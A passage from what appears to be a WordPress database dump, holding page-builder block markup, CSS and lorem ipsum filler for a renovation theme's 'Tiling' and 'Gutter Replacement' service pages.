{\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-df1b904e-a10f-44aa-b563-c465d6e1668c {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-df1b904e-a10f-44aa-b563-c465d6e1668c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"391c8d5a-7ec7-4711-8aa0-de038f503374\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-391c8d5a-7ec7-4711-8aa0-de038f503374 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-391c8d5a-7ec7-4711-8aa0-de038f503374.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"3974ece1-6417-40c4-a023-a498481ada97\"} -->\n<style type=\"text/css\"> .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3974ece1-6417-40c4-a023-a498481ada97 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-3974ece1-6417-40c4-a023-a498481ada97 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"c7fcd398-33f3-4e55-90b5-edaeb87e38e7\"} -->\n<style type=\"text/css\"> .block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-c7fcd398-33f3-4e55-90b5-edaeb87e38e7\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"719252bf-3847-48c5-978d-ad754c743e81\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-719252bf-3847-48c5-978d-ad754c743e81 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-719252bf-3847-48c5-978d-ad754c743e81\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Tiling','','inherit','closed','closed','','226-revision-v1','','','2021-05-27 10:52:48','2021-05-27 10:52:48','',226,'https://cteisys.com/?p=344',0,'revision','',0),(229,1,'2021-05-27 10:53:22','2021-05-27 10:53:22','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-1afee35b-8bdc-4bd9-90b3-00c22fb9a6f4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"83cb1aa8-0231-4055-b4ea-269bc3094807\"} -->\n<style type=\"text/css\"> .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-83cb1aa8-0231-4055-b4ea-269bc3094807 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-83cb1aa8-0231-4055-b4ea-269bc3094807 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"48ae0073-510e-4c83-8809-35ac2817fe1c\"} -->\n<style type=\"text/css\"> .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-48ae0073-510e-4c83-8809-35ac2817fe1c .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-48ae0073-510e-4c83-8809-35ac2817fe1c\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"8267b3f3-870f-4554-a914-4ecf959b186f\"} -->\n<style type=\"text/css\"> .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8267b3f3-870f-4554-a914-4ecf959b186f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8267b3f3-870f-4554-a914-4ecf959b186f\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-b203e381-5b2e-4dec-ba7a-8bd7c1ce10ee\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Gutter Replacement </h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1 id=\"headline\">In need of gutter replacement in Saginaw? Our gutter replacement specialists are ready to help. Why<strong> Us?</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li><strong>Professional Service</strong></li><li><strong>Gutter Replacement</strong></li><li><strong>Gutter Installation</strong></li><li><strong>All Types of Gutters</strong></li><li><strong>All Material Types</strong></li><li><strong>Downspout Services</strong></li><li><strong>Gutter Covers &amp; Leaf Guards</strong></li><li><strong>High Customer Satisfaction</strong></li><li><strong>Residential and Commercial Service</strong></li></ul>\n<!-- /wp:list -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8c9e0ac6-d876-416a-b243-cf53e086ab36\"} -->\n<style type=\"text/css\"> .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8c9e0ac6-d876-416a-b243-cf53e086ab36 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 